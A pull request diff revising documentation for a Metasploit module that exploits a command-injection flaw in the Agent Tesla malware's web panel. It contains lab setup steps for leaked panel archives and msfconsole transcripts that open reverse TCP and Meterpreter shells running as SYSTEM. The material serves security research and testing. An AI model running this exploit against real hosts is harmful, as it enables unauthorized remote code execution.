### PR TITLE
add. exploit module for agent tesla panel rce

### DIFF
--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -1,0 +1,161 @@
+## Introduction
+
+This module exploit the command injection vulnerability in control center of the agent Tesla.
+
+## Setup
+
+Resources for testing are available here:
+<https://github.com/mekhalleh/agent_tesla_panel_rce/resources/>
+
+### Windows
+
+I used WAMP server 3.1.9 x64 configured with PHP version 5.6.40 (for ioncube compatibility).
+
+### Linux
+
+I used a Debian 9 on which I installed PHP version 5.6.40 (for ioncube compatibility).
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+4. Do: `set RHOSTS 192.168.0.15`
+5. Do: `run`
+
+## Targets
+
+```
+   Id  Name
+   --  ----
+   0   Automatic (Dropper)
+   1   Unix (In-Memory)
+   2   Windows (In-Memory)
+```
+
+## Options
+
+**Proxies**
+
+A proxy chain of format type:host:port[,type:host:port][...]. It's optional.
+
+**RHOSTS**
+
+The target IP adress on which the control center responds.
+
+**RPORT**
+
+The target TCP port on which the control center responds. Default: 80
+
+**SSL**
+
+Negotiate SSL/TLS for outgoing connections. Default: false
+
+**TARGETURI**
+
+The base URI path of control center. Default: '/WebPanel
+
+**VHOST**
+
+The target HTTP server virtual host.
+
+## Usage
+
+### Targeting Windows
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set rhosts 192.168.1.21
+rhosts => 192.168.1.21
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set lhost 192.168.1.13
+lhost => 192.168.1.13
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4444
+[*] Targeted operating system is: windows
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Payload uploaded as: .AUKU.php
+[*] Sending stage (38247 bytes) to 192.168.1.21
+[*] Meterpreter session 1 opened (192.168.1.13:4444 -> 192.168.1.21:1036) at 2019-09-04 01:24:12 +0400
+
+meterpreter >
+```
+
+--or--
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 2
+target => 2
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4444
+[*] Sending cmd/windows/reverse_powershell command payload
+[*] Command shell session 2 opened (192.168.1.13:4444 -> 192.168.1.21:1040) at 2019-09-04 01:28:55 +0400
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\wamp64\www\WebPanel\server_side\scripts>whoami
+nt authority\system
+
+C:\wamp64\www\WebPanel\server_side\scripts>
+```
+
+--or--
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 2
+target => 2
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set payload cmd/windows/generic
+payload => cmd/windows/generic
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
+cmd => whoami
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set verbose true
+verbose => true
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[+] The target appears to be vulnerable.
+[*] Sending cmd/windows/generic command payload
+[*] Generated command payload: whoami
+[!] Dumping command output in parsed json response
+nt authority\system
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/http/agent_tesla_panel_rce) >
+```
+
+### Targeting Linux
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4444
+[*] Targeted operating system is: linux
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Payload uploaded as: .WxWf.php
+[*] Sending stage (38247 bytes) to 192.168.1.25
+[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.25:43260) at 2019-09-04 14:44:07 +0400
+
+meterpreter >
+```
+
+--or--
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 1
+target => 1
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
+cmd => whoami
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[*] Sending cmd/unix/generic command payload
+[!] Dumping command output in parsed json response
+www-data
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/http/agent_tesla_panel_rce) >
+```
+
+## References
+
+  1. <https://www.cyber.nj.gov/threat-profiles/trojan-variants/agent-tesla>
+  2. <https://krebsonsecurity.com/2018/10/who-is-agent-tesla/>
+  3. <https://github.com/mekhalleh/agent_tesla_panel_rce/resources/>
+  4. <https://www.exploit-db.com/exploits/47256>

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -1,19 +1,31 @@
 ## Introduction
 
-This module exploit the command injection vulnerability in control center of the agent Tesla.
+This module exploit a command injection vulnerability (authenticated and unauthenticated) in the control center of the agent Tesla.
+
+The Unauthenticated RCE is possible by mixing two vulnerabilities (SQLi + PHP Object Injection).
+
+By observing other sources of this panel find on the Internet to watch the patch, I concluded that the vulnerability is transfomed to an Authenticated RCE.
 
 ## Setup
 
 Resources for testing are available here:
-<https://github.com/mekhalleh/agent_tesla_panel_rce/resources/>
+<https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources/>
 
 ### Windows
 
-I used WAMP server 3.1.9 x64 configured with PHP version 5.6.40 (for ioncube compatibility).
+For WebPanel1.7z (unauthenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 5.6.40 (for ioncube compatibility).
+
+For WebPanel2.7z (authenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 7.2.18 (for ioncube compatibility).
+
+For WebPanel3.7z (authenticated RCE), I used WAMP server 3.1.9 x64 configured with PHP version 7.2.18 (source code is not obfuscated, don't need ioncube).
 
 ### Linux
 
-I used a Debian 9 on which I installed PHP version 5.6.40 (for ioncube compatibility).
+For WebPanel1.7z (unauthenticated RCE), I used a Debian 9 on which I installed PHP version 5.6.40 (for ioncube compatibility).
+
+For WebPanel2.7z (authenticated RCE), I used a Debian 9 on which I installed the default PHP version (for ioncube compatibility).
+
+For WebPanel3.7z (unauthenticated RCE), I used a Debian 9 on which I installed the default PHP version (source code is not obfuscated, don't need ioncube).
 
 ## Verification Steps
 
@@ -35,6 +47,10 @@ I used a Debian 9 on which I installed PHP version 5.6.40 (for ioncube compatibi
 
 ## Options
 
+**PASSWORD**
+
+The Agent Tesla CnC password to authenticate with (needed if you attemp an authenticated RCE).
+
 **Proxies**
 
 A proxy chain of format type:host:port[,type:host:port][...]. It's optional.
@@ -53,7 +69,11 @@ Negotiate SSL/TLS for outgoing connections. Default: false
 
 **TARGETURI**
 
-The base URI path of control center. Default: '/WebPanel
+The base URI path of control center. Default: '/WebPanel'
+
+**USERNAME**
+
+The Agent Tesla CnC username to authenticate with (needed if you attemp an authenticated RCE).
 
 **VHOST**
 
@@ -157,5 +177,6 @@ msf5 exploit(multi/http/agent_tesla_panel_rce) >
 
   1. <https://www.cyber.nj.gov/threat-profiles/trojan-variants/agent-tesla>
   2. <https://krebsonsecurity.com/2018/10/who-is-agent-tesla/>
-  3. <https://github.com/mekhalleh/agent_tesla_panel_rce/resources/>
+  3. <https://github.com/mekhalleh/agent_tesla_panel_rce/tree/master/resources/>
   4. <https://www.exploit-db.com/exploits/47256>
+  5. <https://www.pirates.re/agent-tesla-remote-command-execution-(fighting-the-webpanel)>

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -2,37 +2,32 @@
 
 ### Description
 
-This module exploits a command injection vulnerability within the control center of Agent Tesla versions XXX to XXX (was this ever patched?). Attackers can turn this vulnerability into an RCE can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the `WebPanel/server_side/scripts/server_processing.php` file.
-
-Note that due to additional security updates that were made to the Agent Tesla panel on September 12th 2018, any web panel versions released on or after this date will require authentication in order for the attacker to gain RCE. The code which was introduced can be seen in the snippet below:
+This module exploits a command injection vulnerability within the control center of Agent Tesla. Attackers can turn this vulnerability into an RCE can be obtained by exploiting two vulnerabilities (SQLi + PHP Object Injection) that occur within the `WebPanel/server_side/scripts/server_processing.php` file. On versions prior to September 12th 2018, attackers can exploit this vulnerability to gain unauthenicated RCE as the user running the web server. Versions released on or after September 12th 2018 have the following fix that was introduced which means that attackers will require valid credentials in order to exploit this vulnerability:
 
 ```
 session_start();
-  if (!isset($_SESSION['logged_in'])
-    || $_SESSION['logged_in'] !== true) {
-    header('Location: login.php');
-    exit;
-  }
+if (!isset($_SESSION['logged_in'])
+   || $_SESSION['logged_in'] !== true) {
+   header('Location: login.php');
+   exit;
+}
 ```
 
 **NOTE:**
 
-Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify exactly which releases were available for download. However it is possible to perform some level of version identification by using the dates/times of the files contained in the `zip` archives to evaluate how recent/old a particular release is. From the file timestamps, the following versions were determined to be available via [CyberCrime Tracker](https://cybercrime-tracker.net/):
+Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to locate several Agent Tesla web panels available for download. As there are no version numbers displayed in the Agent Tesla control center, it was hard to identify exactly which releases were available for download. However it was possible to perform to determine roughly when various editions of Agent Tesla were released by using the timestamps on the files contained in the `zip` archives. From this information, it was determined that [CyberCrime Tracker](https://cybercrime-tracker.net/) had the following unique versions available for download:
 
-[WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) -Released in 2017- (unauthenticated RCE), source code protected by `ioncube`.
+[WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) - Released in 2017 - (unauthenticated RCE), source code protected by `ioncube`.
 
  * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 5.6.40.
- * Tested on Debian 9.9.0 with PHP version 5.6.40.
 
-[WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) -Released in 2018- (authenticated RCE), source code protected by `ioncube`.
+[WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) - Released in 2018 - (authenticated RCE), source code protected by `ioncube`.
 
  * Tested on Windows 7 x64 with WAMP server 3.2.0 x64 and PHP version 7.2.18.
- * Tested on Debian 9.9.0 with PHP version 7.2.31.
 
-[WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) -Released in 2019- (authenticated RCE), source code is not obfuscated, **don't need** `ioncube`.
+[WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) - Released in 2019 - (authenticated RCE), source code is not obfuscated, **don't need** `ioncube`.
 
  * Tested on Windows 7 x64 WAMP server 3.2.0 x64 and PHP version 5.6.40.
- * Tested on Debian 9.9.0 with PHP version 7.2.31.
 
 ### Setup
 
@@ -56,73 +51,6 @@ Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to 
 12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field, set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
 13. Browse to `http://127.0.0.1/WebPanel/login.php` and confirm you can log into the web panel and view the main web panel itself. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
 
-#### Using Linux
-
-##### Install LAMP (Apache, MySQL, PHP)
-
-For this, you can use a Linux Debian 9.9.0 (Stretch) x86_x64 as sandboxing system.
-
-1. Install LAMP (Apache, MySQL, PHP).
-
-```bash
-sudo apt-add-repository ppa:ondrej/apache2
-sudo apt-add-repository ppa:ondrej/php
-sudo apt-get update
-sudo apt-get install apache2 apache2-utils mariadb-server mariadb-client ca-certificates apt-transport-https
-
-# For PHP 5.6.40:
-sudo apt-get install php5.6 php5.6-cli php5.6-common php5.6-curl php5.6-mbstring php5.6-mysql php5.6-xml libapache2-mod-php5.6 php5.6-json php5.6-opcache php5.6-readline
-
-# For PHP 7.2.31:
-sudo apt-get install php7.2 php7.2-cli php7.2-common php7.2-curl php7.2-mbstring php7.2-mysql php7.2-xml libapache2-mod-php7.2 php7.2-json php7.2-opcache php7.2-readline
-```
-
-2. Execute `sudo mysql_secure_installation` and press enter when prompted for the `root` password, set a new `root` user password (be sure to remember this!) and press `Y` for the rest of the prompts.
-
-3. Create a blank database for Agent Tesla using the following commands:
-
-```
-sudo mysql -u root -ppassword
-
-CREATE DATABASE tesla;
-CREATE USER 'user' IDENTIFIED BY 'password';
-GRANT USAGE ON *.* TO 'user'@localhost IDENTIFIED BY 'password';
-GRANT ALL PRIVILEGES ON `tesla`.* TO 'user'@localhost;
-FLUSH PRIVILEGES;
-exit
-```
-
-4. Download the Agent Tesla control panels locally:
-
-```
-wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z
-wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z
-wget https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z
-```
-
-4. Install the p7zip-full package and extract the files from the command line
-```
-sudo apt install p7zip-full
-7z x WebPanel1.7z && mv WebPanel/ WebPanel1/
-7z x WebPanel2.7z && mv WebPanel/ WebPanel2/
-7z x WebPanel3.7z && mv WebPanel/ WebPanel3/
-chmod a+rw WebPanel*/
-```
-5. Copy one of the target webpanels over for installation and delete the default config.php file
-```
-sudo cp -r WebPanel3/ /var/www/html/
-sudo mv /var/www/html/WebPanel3/ /var/www/html/WebPanel/
-sudo rm -rf /var/www/html/WebPanel/config.php
-```
-6. Make the /var/www/html/WebPanel/ directory readable and writeable by all
-```
-sudo chmod -R a+rw /var/www/html/WebPanel/
-sudo chown -R www-data:www-data /var/www/html/WebPanel/
-```
-7. Browse to http://127.0.0.1/WebPanel/setup.php and set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `user`, the `MySql Password` field to `password`, the `Database Name` field to `tesla`, the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
-
-8. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out. Then browse to Browse to `http://127.0.0.1/WebPanel/login.php` and log in with the login details you placed in the `Login Informations` section. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
-
 #### Installing Ioncube
 
 ##### Windows
@@ -141,20 +69,6 @@ Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Install%20WAMP%20Server%20
 6. Follow the installation instructions.
 7. Right click on the WAMP tray icon and click `Refresh`.
 8. Browse to `http://127.0.0.1/loader-wizard/ioncube/loader-wizard.php?timeout=0&ini=0&page=loader_check` and verify that ionCube Loader was installed successfully.
-
-
-##### Linux
-
-Follow [Install LAMP (Apache, MySQL, PHP)](#Install%20LAMP%20%28Apache%2C%20MySQL%2C%20PHP%29) steps.
-
-1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.tgz).
-2. Make sure you have a proper version of PHP installed for the WebPanel you wish to use before using the `ioncube loader wizard`.
-
-* For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40.
-* For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you need PHP 7.2.31.
-
-3. Uncompress `loader-wizard.tgz` into your web root directory: `/var/www/html/`.
-4. Go to http://localhost/ioncube/loader-wizard.php and follow the installation instructions.
 
 ## Verification Steps
 
@@ -185,48 +99,6 @@ The Agent Tesla CnC username to authenticate with (needed for authenticated RCE 
 ```
 
 ## Scenarios
-
-### Agent Tesla (panel < September 12 2018) Unauthenticated on Linux
-
-1. Start msfconsole
-2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
-3. Do: `set RHOSTS 192.168.1.21`
-4. Do: `run`
-
-```
-msf5 exploit(multi/http/agent_tesla_panel_rce) > run
-
-[*] Started reverse TCP handler on 192.168.1.13:4444
-[*] Targeted operating system is: linux
-[*] Sending php/meterpreter/reverse_tcp command payload
-[*] Payload uploaded as: .WxWf.php
-[*] Sending stage (38247 bytes) to 192.168.1.25
-[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.25:43260) at 2019-09-04 14:44:07 +0400
-
-meterpreter >
-```
-
-### Agent Tesla (panel >= September 12 2018) Authenticated on Linux
-
-1. Start msfconsole
-2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
-3. Do: `set RHOSTS 192.168.1.21`
-4. Do: `set USERNAME admin`
-5. Do: `set PASSWORD password`
-
-```
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 1
-target => 1
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set cmd whoami
-cmd => whoami
-msf5 exploit(multi/http/agent_tesla_panel_rce) > run
-
-[*] Sending cmd/unix/generic command payload
-[!] Dumping command output in parsed json response
-www-data
-[*] Exploit completed, but no session was created.
-msf5 exploit(multi/http/agent_tesla_panel_rce) >
-```
 
 ### WebPanel1.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 5.6.40, Apache 2.4.41, MariaDB 10.4.10
 ```

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -51,7 +51,7 @@ Using [CyberCrime Tracker](https://cybercrime-tracker.net/), it was possible to 
 9. Confirm the database was created, and afterwards log out of `PHPMyAdmin`.
 9. Unzip one of the 7zip files. You should see a folder called `WebPanel` that is contained within. Copy this folder to `C:\wamp64\www`.
 10. Delete the file at `C:\wamp\www\WebPanel\config.php` if it exists.
-11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions to install `IornCube` in the `Using Ioncube` section.
+11. OPTIONAL: If using [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) or [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z), follow the directions to install `IornCube` in the [Installing Ioncube](#Installing Ioncube) section.
 11. Browse to `http://127.0.0.1/WebPanel/logout.php` to ensure you are properly logged out and then browse to `http://127.0.0.1/WebPanel/setup.php`.
 12. Set the `Database Host` field to `127.0.0.1`, the `MySql Username` field to `root`, leave the `MySql Password` field, set the `Database Name` field to `tesla` and set the `Username` and `Password` fields under `Login Informations` section to the username and password you would like to log into the web panel as.
 13. Browse to `http://127.0.0.1/WebPanel/login.php` and confirm you can log into the web panel and view the main web panel itself. You should see a header titled `Dashboard` followed by some sections labeled `Computers`, `Keystrokes`, `Passwords` and `Screenshots` if the login succeeded.
@@ -93,72 +93,34 @@ FLUSH PRIVILEGES;
 exit
 ```
 
-#### Install Agent Tesla Web panel (simple way)
+#### Installing Ioncube
 
-For this step, you need a functional web environment installed and to have created an empty database (refer to the configuration above).
+##### Windows
 
-NOTE: The Agent Tesla panels can be tracked on the web and the sources can be found by looking for the `WebPanel.zip` file at the root directory. Some attackers are stupid and leave this file lying around on the server.
-
-The [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) should be used preferably because it is ***not protected*** by `ioncube` and because of this the source code is in clear (but all the other panels are functional with a little more complicated configuration).
-
-Based on the file creation dates (and diff) to get an idea of ​​the panels evolution, you have more details (in french) on [Agent Tesla Remote Command Execution (fighting the WebPanel)](https://www.pirates.re/agent-tesla-remote-command-execution-fighting-the-webpanel/).
-
-***IMPORTANT:*** This version of the panel is "by default" patched against unauthenticated RCE. But this is explain in the blog post [Agent Tesla Remote Command Execution (fighting the WebPanel)](https://www.pirates.re/agent-tesla-remote-command-execution-fighting-the-webpanel/). The patch simply consist adding authentication on the vulnerable page. And that the variables are still not properly sanitized.
-
-To put it simply, with this version of the panel, by default you have an 'Authenticated RCE'.
-
-Now, if you want to "switch" to test simply the `Unauthenticated RCE` with this panel, ***just put the authentication in comment*** on the `WebPanel/server_side/scripts/server_processing.php` page.
-
-As example:
-
-```php
-/* // Comment the authentication.
-session_start();
-  if (!isset($_SESSION['logged_in'])
-    || $_SESSION['logged_in'] !== true) {
-    header('Location: login.php');
-    exit;
-  }
-*/
-```
-
-1. Uncompress the [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) into your Web directory.
-2. Remove the config file `WebPanel/config.php` (it is generated at step 3).
-3. Go to: <http://localhost/WebPanel/setup.php>.
-4. You can log into Agent Tesla Web panel, all is done.
-
-#### Using Ioncube
-
-##### With Windows
-
-Follow [Install WAMP Server 3.2.0 x64](#Setup) steps.
+Follow [Install WAMP Server 3.2.0 on Windows 10 x64](#Setup) steps.
 
 1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.zip).
-2. Make sure you have a proper version of PHP selected for the WebPanel you want install with `Wamp` before using `ioncube loader wizard`.
+2. Make sure you have the proper version of PHP selected within `Wamp` for the WebPanel you want install before using `ioncube loader wizard`.
 
   * For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40.
   * For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you need PHP 7.2.18.
 
-
 3. Uncompress `loader-wizard.zip` into your web root directory: `C:\Wamp64\www\`.
 4. Go to http://localhost/loader-wizard/ioncube/loader-wizard.php and follow the installation instructions.
 
-Follow [Install Agent Tesla Web panel (simple way)](#Setup) steps replacing `WebPanel3.7z` by your obfuscated panel.
 
-##### With Linux
+##### Linux
 
 Follow [Install LAMP (Apache, MySQL, PHP)](#Setup) steps.
 
 1. Download [ioncube loader wizard](https://www.ioncube.com/loader-wizard/loader-wizard.tgz).
-2. Make sure you have a proper version of PHP selected for the WebPanel you want install with `Wamp` before using `ioncube loader wizard`.
+2. Make sure you have a proper version of PHP installed for the WebPanel you wish to use before using the `ioncube loader wizard`.
 
 * For [WebPanel1.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel1.7z) you need PHP 5.6.40.
 * For [WebPanel2.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel2.7z) you need PHP 7.2.31.
 
 3. Uncompress `loader-wizard.tgz` into your web root directory: `/var/www/html/`.
 4. Go to http://localhost/ioncube/loader-wizard.php and follow the installation instructions.
-
-Follow [Install Agent Tesla Web panel (simple way)](#Setup) steps replacing `WebPanel3.7z` by your obfuscated panel.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
+++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md
@@ -198,32 +198,13 @@ www-data
 msf5 exploit(multi/http/agent_tesla_panel_rce) >
 ```
 
-### Agent Tesla (panel < September 12 2018) Unauthenticated on Windows
-
-1. Start msfconsole
-2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
-3. Do: `set RHOSTS 192.168.1.21`
-4. Do: `run`
-
-```
-msf5 exploit(multi/http/agent_tesla_panel_rce) > set lhost 192.168.1.13
-lhost => 192.168.1.13
-msf5 exploit(multi/http/agent_tesla_panel_rce) > run
-
-[*] Started reverse TCP handler on 192.168.1.13:4444
-[*] Targeted operating system is: windows
-[*] Sending php/meterpreter/reverse_tcp command payload
-[*] Payload uploaded as: .AUKU.php
-[*] Sending stage (38247 bytes) to 192.168.1.21
-[*] Meterpreter session 1 opened (192.168.1.13:4444 -> 192.168.1.21:1036) at 2019-09-04 01:24:12 +0400
-
-meterpreter >
-```
-
-### WebPanel2.7z on Windows 10 
-
+### WebPanel1.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 5.6.40, Apache 2.4.41, MariaDB 10.4.10
 ```
 msf5 > use exploit/multi/http/agent_tesla_panel_rce
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5
+LHOST => 169.254.115.5
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16
+RHOSTS => 169.254.162.16
 msf5 exploit(multi/http/agent_tesla_panel_rce) > show options
 
 Module options (exploit/multi/http/agent_tesla_panel_rce):
@@ -232,7 +213,7 @@ Module options (exploit/multi/http/agent_tesla_panel_rce):
    ----       ---------------  --------  -----------
    PASSWORD                    no        The Agent Tesla CnC password to authenticate with
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RHOSTS     169.254.162.16   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT      80               yes       The target port (TCP)
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /WebPanel/       yes       The URI where the Agent Tesla CnC panel is located on the target
@@ -244,7 +225,7 @@ Payload options (php/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST                   yes       The listen address (an interface may be specified)
+   LHOST  169.254.115.5    yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -255,6 +236,51 @@ Exploit target:
    0   Automatic (PHP-Dropper)
 
 
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 6633
+LPORT => 6633
+msf5 exploit(multi/http/agent_tesla_panel_rce) > check
+[+] 169.254.162.16:80 - The target is vulnerable.
+msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit
+
+[*] Started reverse TCP handler on 169.254.115.5:6633
+[*] Targeted operating system is: windows
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Payload uploaded as: .rzzg.php to C:\wamp64\www\\WebPanel\\server_side\scripts\.rzzg.php
+[*] Sending stage (38288 bytes) to 169.254.162.16
+[*] Meterpreter session 1 opened (169.254.115.5:6633 -> 169.254.162.16:51956) at 2020-06-16 16:01:57 -0500
+[+] Deleted C:\wamp64\www\\WebPanel\\server_side\scripts\.rzzg.php
+
+meterpreter > getuid
+Server username: SYSTEM (0)
+meterpreter > sysinfo
+Computer    : DESKTOP-EMAVUN1
+OS          : Windows NT DESKTOP-EMAVUN1 10.0 build 18363 (Windows 10) AMD64
+Meterpreter : php/windows
+meterpreter > ls
+Listing: C:\wamp64\www\WebPanel\server_side\scripts
+===================================================
+
+Mode              Size   Type  Last modified              Name
+----              ----   ----  -------------              ----
+100666/rw-rw-rw-  2244   fil   2016-09-21 18:10:39 -0500  ids-arrays.php
+100666/rw-rw-rw-  2235   fil   2016-09-21 18:10:39 -0500  ids-objects.php
+100666/rw-rw-rw-  2069   fil   2016-09-21 18:10:39 -0500  jsonp.php
+100666/rw-rw-rw-  7959   fil   2016-09-21 18:10:40 -0500  mysql.sql
+100666/rw-rw-rw-  1453   fil   2016-09-21 18:10:40 -0500  objects.php
+100666/rw-rw-rw-  1957   fil   2016-09-21 18:10:40 -0500  post.php
+100666/rw-rw-rw-  7921   fil   2016-09-21 18:10:40 -0500  postgres.sql
+100666/rw-rw-rw-  1500   fil   2017-08-14 16:48:16 -0500  server_processing.php
+100666/rw-rw-rw-  7857   fil   2016-09-21 18:10:40 -0500  sqlite.sql
+100666/rw-rw-rw-  8021   fil   2016-09-21 18:10:40 -0500  sqlserver.sql
+100666/rw-rw-rw-  14438  fil   2016-09-30 04:53:10 -0500  ssp.class.php
+
+meterpreter >
+```
+
+### WebPanel2.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10
+
+```
+msf5 > use exploit/multi/http/agent_tesla_panel_rce
 msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5
 LHOST => 169.254.115.5
 msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test
@@ -329,4 +355,109 @@ Meterpreter : php/windows
 meterpreter > getuid
 Server username: SYSTEM (0)
 meterpreter >
+```
+
+### WebPanel3.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10
+```
+msf5 > use exploit/multi/http/agent_tesla_panel_rce
+msf5 exploit(multi/http/agent_tesla_panel_rce) > show optons
+[-] Invalid parameter "optons", use "show -h" for more information
+msf5 exploit(multi/http/agent_tesla_panel_rce) > show options
+
+Module options (exploit/multi/http/agent_tesla_panel_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD                    no        The Agent Tesla CnC password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /WebPanel/       yes       The URI where the Agent Tesla CnC panel is located on the target
+   USERNAME                    no        The Agent Tesla CnC username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
